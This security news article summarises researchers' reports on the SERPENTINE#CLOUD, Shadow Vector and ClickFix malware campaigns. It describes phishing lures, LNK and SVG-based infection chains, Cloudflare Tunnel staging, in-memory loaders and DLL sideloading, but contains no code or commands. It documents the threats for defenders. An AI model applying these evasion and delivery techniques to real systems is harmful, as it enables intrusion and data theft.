Emerging Malware Campaign Leverages Cloudflare Tunnels for RAT Deployment Through Phishing Strategies

A recent campaign, designated as SERPENTINE#CLOUD by Securonix, exploits Cloudflare Tunnel subdomains to distribute malicious payloads via phishing emails that contain harmful attachments. This attack vector utilizes Cloudflare’s infrastructure along with Python-based loaders to deliver memory-injected payloads through a chain of disguised shortcut files and obfuscated scripts, as reported by security researcher Tim Peck.

The malicious operations initiate with phishing emails themed around payments or invoices, containing links to zipped documents. These documents house a Windows shortcut (LNK) file, which is camouflaged as a legitimate document to deceive victims into executing it, thus triggering the infection sequence. The intricate multi-stage process ultimately results in the operation of a Python-based shellcode loader designed to execute payloads packed with the open-source Donut loader strictly in memory.

According to Securonix, the primary targets of this campaign include the United States, United Kingdom, Germany, and various nations across Europe and Asia. The specific identity of the perpetrator(s) remains unrevealed; however, their proficiency in English has been noted.

This threat activity cluster is remarkable for its evolving initial access techniques, transitioning from URL files to LNK shortcut files that mimic PDF documents. Subsequently, these payloads retrieve additional stages over WebDAV through the Cloudflare Tunnel subdomains.

A similar variation of this campaign was documented previously by eSentire and Proofpoint, highlighting its facilitation of further malicious activities involving AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm.

The utilization of TryCloudflare provides distinct advantages to malicious actors. By leveraging reputable cloud service providers as a façade for their operations, they effectively obfuscate their activities, complicating detection. Relying on a recognized subdomain (“*.trycloudflare[.]com”) for malicious purposes significantly hinders defensive measures, allowing their operations to evade traditional URL or domain-based blocking techniques.

The initial infection triggers when victims execute the LNK files, which download a secondary payload, a Windows Script File (WSF), from a remote WebDAV share situated on a Cloudflare Tunnel subdomain. The WSF file is executed through cscript.exe, maintaining a low profile to avoid alerting the victim.

This WSF file serves as a streamlined VBScript-based loader tasked with executing an external batch file from another Cloudflare domain. The “kiki.bat” file acts as the primary script for delivering subsequent payloads in the sequence, purposefully designed to operate stealthily and ensure persistence.

The batch script’s primary functions include displaying a benign PDF document, inspecting the system for antivirus software, and downloading and executing Python payloads, enabling the invocation of Donut-packed payloads like AsyncRAT or Revenge RAT in memory.

Securonix suggested that the script may have been generated using a large language model, indicated by the presence of well-structured comments in the source code. They described the SERPENTINE#CLOUD campaign as a sophisticated and layered infection chain that integrates social engineering tactics, living-off-the-land techniques, and evasive in-memory code execution. The exploitation of Cloudflare Tunnel infrastructure further complicates network visibility, allowing the attacker a disposable and encrypted transport layer for staging malicious files without relying on conventional infrastructures.

In another revelation, Acronis has identified an active malware operation named Shadow Vector targeting Colombian users through phishing emails containing corrupted scalable vector graphics (SVG) files purporting to represent court notifications. Researchers at Acronis reported that attackers are disseminating spear-phishing emails impersonating trusted Colombian institutions, delivering SVG files that link to JavaScript or VBScript stagers hosted on public platforms, or including directly executable payloads within password-protected ZIP files.

This campaign has facilitated the deployment of remote access trojans, including AsyncRAT and Remcos RAT, with recent activities utilizing a .NET loader linked to Katz Stealer. The attack chains often obscure payloads within Base64-encoded text of image files hosted on the Internet Archive.

A critical aspect of this malware campaign is the adoption of SVG smuggling, which allows the delivery of malicious ZIP files through SVG files hosted on popular file-sharing services such as Bitbucket, Dropbox, and Discord. The downloaded archives typically include both legitimate executables and malicious DLLs, with the latter sideloaded to ultimately deploy the trojans.

Researchers indicated that this evolution in SVG smuggling adopts a modular, memory-resident loader capable of executing payloads dynamically and entirely in memory, which leaves minimal traces for detection. The presence of Portuguese language strings and method parameters within the loader suggests a possible connection to TTPs commonly linked with Brazilian banking malware, hinting at potential code sharing or regional actor collaboration.

Furthermore, there has been a noticeable surge in social engineering attacks utilizing the ClickFix tactic to deploy stealers and remote access trojans, such as Lumma Stealer and SectopRAT, disguised as fixes for issues or CAPTCHA verifications. Data shared by ReliaQuest indicates that drive-by compromises constituted 23% of all phishing tactics observed between March and May 2025, with ClickFix tactics being pivotal in enabling drive-by downloads.

ClickFix proves effective primarily through its ability to mislead targets into performing seemingly innocuous, routine actions, which are typically overlooked as harmless. This method compels users to inadvertently contribute to the infection process, circumventing the need for sophisticated exploit mechanisms targeting software vulnerabilities.

ReliaQuest noted a shift from external resources being a primary attack strategy to an increased emphasis on exploiting user errors rather than technical vulnerabilities. This transition is likely driven by the simplicity, high success rate, and adaptability of social engineering tactics such as ClickFix.